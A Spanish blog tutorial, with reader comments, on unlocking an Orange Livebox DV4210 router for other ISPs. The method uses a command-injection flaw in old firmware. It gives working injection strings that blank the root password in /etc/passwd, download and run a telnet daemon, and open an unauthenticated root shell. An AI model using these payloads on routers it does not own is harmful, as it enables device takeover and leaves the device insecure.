OpenWRT en Inventel Livebox DV4210 (Parte 1/3) – Liberación


1. EL LIVEBOX

Como ya sabreis, Orange distribuye el router Livebox bloqueado para que no se pueda usar con otros proveedores de internet. El bloqueo es a 2 niveles.

  1. Solo acepta conexiones PPPoE o PPPoA (las que ofrece Orange).
  2. Solo permite nombres de usuario del tipo xxx@orangeadsl, xxx@wanadooadsl y similares. Por tanto, no podremos configurarlo para usarlo con otro ISP.

Al desbloquearlo conseguimos 2 cosas:

  1. Que nos permitirá seleccionar cualquier tipo de conexión: PPPoA, PPPoE, DHCP + NAT, RFC1483, bridge.
  2. Un aumento del rendimiento global en las velocidades de subida y bajada.

2. QUE NECESITAREMOS

Para desbloquear el router vamos a necesitar los siguientes elementos:

  1. Estar familiarizado en el manejo del router, asignación de IPs privadas, etc…
  2. Un PC.
  3. Un cable USB.
  4. El CD de configuración del Livebox. Si no lo tienes, puedes bajarlo desde aquí.
  5. Un servidor FTP que debemos instalar en nuestro PC. En nuestro caso, usamos el Serv-U, que es un servidor FTP muy sencillo de instalar y configurar.
  6. Un servidor de telnet, utelnetd.
  7. Una utilidad para convertir el código que nos devuelve el router (solo para liberarlo).
  8. Unos 15 minutos de tiempo.

3. ¿EN QUE SE BASA EL DESBLOQUEO?

El desbloqueo se basa en una vulnerabilidad de los Firmwares antiguos que nos permite introducir comandos desde la configuración del ESSID. Lo que haremos es instalar en el router un servidor de telnet que nos permitirá ejecutar comandos en el router y que nos proporcione el código de desbloqueo del router. Una vez desbloqueado, tendremos acceso a todas las opciones del router sin ningún tipo de limitación impuesta por Orange.

4. EL DOWNGRADE

La vulnerabilidad de la inyección de comandos desde la ventana ESSID se corrigió en los últimos Firmwares. Por tanto, lo primero que debemos hacer es hacer un downgrade del firmware del router, es decir, pasar a una versión anterior que tenga la vulnerabilidad. Para ello vamos a bajarnos el Firmware adecuado desde aquí y lo guardamos en nuestro PC.

Antes de desactualizar el Firmware vamos a asignar una IP fija a nuestro PC. En nuestro caso será 192.168.1.2 y la del router será 192.168.1.1.

Conectamos el Livebox y el PC usando el cable USB. Instalamos el software de configuración que viene en el CD (que puedes encontrar en este mismo post en el punto 2). Una vez finalizado, vemos que tenemos una utilidad que se llama “configuración de fábrica USB”.

Una vez pulsado, nos aparece una ventana donde hemos de seleccionar el Firmware que vamos a instalar en el router.

A partir de aquí el proceso se completa como una actualización normal de firmware.

Una vez completado el proceso, tendremos el Firmware vulnerable listo.

5. EL SERVIDOR DE TELNET

El Utelnetd lo renombraremos por comodidad a “u”. Lo podemos descargar desde su página o bien lo puedes descargar ya renombrado a “u” desde aquí.

Guardamos el fichero en un directorio.

6. EL SERVIDOR FTP

Ahora vamos a instalar el Serv-U en nuestro PC. La instalación no tiene ningún misterio y solo debemos estar atentos en que debemos permitir el acceso anónimo y poner como raíz del FTP el directorio donde hemos guardado el fichero “u”.

7. INYECCIÓN DE COMANDOS

Para inyectar los comandos y evitar errores os recomiendo que hagais un “copiar y pegar” de los comandos.

Entramos en el router (admin/admin) y vamos a la pantalla de usuario conexión y en el nombre de usuario ponemos:


;echo root::0:0:root:/root:/bin/sh >/etc/passwd

Con ello le quitamos la contraseña de root al router.

Luego en Configuración->Avanzada->Inalámbrico, cambia el ESSID a:


;cd /etc;wget ftp://192.168.1.2/u

Pulsamos en “Enviar” y luego en “Aplicar”. Pasado unos instantes, el router se reinicia solo.

Con ello lo que hacemos es decirle al router que se conecte por FTP a nuestro PC y se descargue el fichero “u”. Si tu PC usa otra IP solo tienes que sustituir 192.168.1.2 por la IP privada de tu PC.

Ahora, volvemos a cambiar el ESSID y ponemos:


;chmod 777 /etc/u

Con esta acción damos permisos de ejecución al fichero “u”.

Por último, volvemos a cambiar el ESSID a:


;/etc/u -p 23 -l /bin/sh -d

Una vez más pulsamos en “Enviar” y luego en “Aplicar”. El router se volverá a reiniciar.

8. CONECTAR POR TELNET

Si hemos realizado todos los pasos de manera correcta, podremos conectar via Telnet con nuestro router. Abrimos una ventana de comandos y tecleamos “telnet 192.168.1.1″ y nos aparecerá el Busybox.

Ahora debemos ejecutar lo siguiente en el telnet:

redboot_fconfig_get –parameter h235_key /dev/mtd4

Nos devolverá una clave hexadecimal. La copiamos y la introducimos en esta página web http://www.agp.dsl.pipex.com/h235tounlock.html. Tambien podemos bajar estos archivos a nuestro ordenador y hacerlo en local.

Nos devolverá la clave ya convertida lista para desbloquear el router.

Por último, solo queda acceder por HTTP al router e ir a la página http://192.168.1.1/brdgoff.html pegar el código de desbloqueo proporcionado por la página y ya tendremos el router liberado para cualquier operador y con un firmware sin restricciones.

Una vez reiniciado el router, vemos como lo podremos configurar para cualquier ISP.


Ya tenemos nuestro router Livebox liberado (no necesario para cargar OpenWRT) y con acceso Telnet.

En el siguiente post explicare como cargar el firmware OpenWRT en nuestro LiveBox. Este OpenWRT es una version en desarrollo, por lo que todas las funcionaliadades del router (por ejemplo, la conexion ADSL) no estaran disponibles y no se si lo estarán en un futuro.

Fuente: ADSLZone.net

Share
Javier Rodriguez Escrito por:

15 comentarios

  1. cbg
    9 de enero de 2012

    hay varias partes que fallan en el tutorial. La inyección de comandos no me funciono tal y como lo explicas. Así es menos engorroso y me funciono bien pones «;echo root::0:0:root:/root:/bin/sh >/etc/passwd ;cd /etc;wget ftp://192.168.1.2/u ;chmod 777 /etc/u» en el nombre de usuario, luego cuando se reinicia de nuevo en el nombre de usuario ;/etc/u -p 23 -l /bin/sh -d nada de cambiar el ESSID. Otra parte que no me funciono es la linea del telnet que falta un guion antes de parameter son dos en vez de uno como tienes puesto aunque eso creo que es un error de la autocorreción del blog o algo así redboot_fconfig_get –parameter h235_key /dev/mtd4

  2. cbg
    9 de enero de 2012

    efectivamente es un error del blog puse dos guiones antes de parameter y solo aparece uno.

  3. alfmanda
    6 de marzo de 2012

    una vez con acceso livebox («busybox») por telnet. Se podría montar un servidor samba o nfs? qué modulos son necesarios descargar. Mi idea es, una vez montamos un pendrive usb en fat, habilitar la compartición en red de sus archivos, para eso es necesario montar un servidor samba en nuestro livebox

  4. 6 de marzo de 2012

    Lo que quieres hacer se puede hacer, pero para ello te hace falta meter OpenWRT, ya que lo que pides entiendo yo, que quieres meter las aplicaciones necesarias al firm del Livebox para que haga de servidor samba, pero el problema no es solo ese, sino tambien lo modulos necesarios para el Kernel.

    Instalando OpenWRT, previamente habiendolo compilado con soporte para samba, puedes obterner lo que necesitas. Doy fe de ello porque lo instale en su dia y funcionaba.

  5. victor
    9 de mayo de 2012

    Yo no tengo el CD de instalación, he probado de descargarmelo e instalarlo en un WindowsXP. Al extraerlo y ejecutarlo me da el error que dice: No supported OS. Que sistema operativo tienes instalado? Cual seria la solución?

  6. victor
    9 de mayo de 2012

    Nada, solucionado… Lo que pasaba era que le daba al setup desde el archivo comprimido. Error mio. Seguiré tu blog y diré algo al respeto

  7. Eternal
    14 de mayo de 2012

    Hola, primero quisiera saber si este procedimiento sirve para el «Sagemcom LiveBox 2 R SP» de Orange y luego si fuera asi como se conecta con USB, porque trae dos puertos USB pero son para unidades de almacenamiento.

    Salu2.

  8. 27 de mayo de 2013

    Hola! javi puedes auydarme por favor. como puedo cambiar el firmware de LIVEBOX 2 con OpenWRT , los pasos , o un manual. gracias

    un saludo.

  9. 5 de julio de 2013

    El livebox2 tiene hardware distinto del livebox normal. Busca en la pagina de OpenWrt.org a ver si han desarrollado algo, ya que no estoy al tanto de como van los desarrollos para Livebox2 o incluso si los hay…

  10. Oliv
    6 de septiembre de 2014

    Gracias por la guia, injecte un comando antes para hacer una copia del /etc/passwd asi averigue el password de root, pero despues vi que tampoco tiene mucha utilidad. Pero si se ve ahi dentro que hay un usuario TEST que utiliza una herramiendo /usr/bin/dt interesante para jugare.

    Por casualidad no conservaras algo sobre la web de Danitool? se hospedaba en myOpera pero ya lo cerraron.
    Donde conseguiste el utelnetd compilado para mips??

  11. 11 de septiembre de 2014

    Conservo unas cuantas cosillas de Danitool. A ver si en breve me pongo un poco las pilas con el blog y lo actualizo un poco, que llevo una temporada desaparecido. He avanzado un poco mas sobre el livebox y han cambiado unas cuantas cosas a la hora de compilar OpenWRT, pero ya lo he conseguido hacer.

  12. mRgANDALF
    9 de noviembre de 2014

    Hola. Mi paquete no traía cable USB. He probado con uno normal con un adaptador para convertirlo en macho-macho y no me lo reconoce. Es imprescindible este cable? Donde puede conseguirse?
    Gracias

  13. adrian
    4 de abril de 2016

    Buenas,estoy siguiendo todos los pasos,pero en actualizar desde usb me deja escribir la dirección del firmware pero no tira para adelante,gracias de antemano

  14. pedro
    12 de febrero de 2017

    mi problema es el mismo del comentario sobre usb
    No tengo cable macho-macho usb
    ¿podria hacerse a traves de la conexión ethernet?

  15. JCCG
    20 de febrero de 2017

    HOOLAA
    Preguntas:
    -> Cable USB tiene q ser macho-macho… pensaba montarlo usando dos cables usb de impresora q m sobran (hay q invertir los colores de TX RX ???)… Antes de meterme en eso, necesito q m confirmeis q esto funciona.

    -> Despues de downgradear el router a u firmware viejo, con sus bugs y sus problemas de seguridad, para poder desbloquearlo… podriamos regresar a un firmware actualizado del fabricante q no esté capado? El OpenWrt en verdad me resulta un total rompecabezas, porque hay poca info y para q funcione cualquier cosa hay q ser experto en Linux y comms… hay alguna otra opción???

    Gracias, Salu2

Deja una respuesta

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *